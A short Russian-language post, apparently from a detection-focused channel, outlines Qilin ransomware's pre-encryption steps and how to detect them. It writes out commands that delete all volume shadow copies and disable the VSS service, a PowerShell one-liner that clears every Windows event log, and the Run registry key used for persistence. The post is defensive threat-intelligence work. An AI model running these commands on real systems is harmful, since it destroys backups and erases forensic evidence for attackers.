В разборе TTP Qilin авторы описывают этап подготовки перед шифрованием
🔤остановка службы и удаление теневых копий
wmic service where name=’vss’ call ChangeStartMode Manual
net start vss
vssadmin.exe delete shadows /all /quiet
net stop vss
wmic service where name=’vss’ call ChangeStartMode Disabled
🔤очистка логов во всех журналах
“powershell” $logs = Get-WinEvent -ListLog * | Where-Object {$_.RecordCount} | Select-Object -ExpandProperty LogName ; ForEach ( $l in $logs | Sort | Get-Unique ) {[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($l)}
🔤закреп в реестре
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
🔭 Обнаружение:
🔤 отслеживаем использование
wmic, vssadmin🔤 отслеживаем использование ps -
ClearLog, Get-WinEvent🔤 создание новых ключей в ветке реестра
*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run#detection@detectioneasy
#ttp@detectioneasy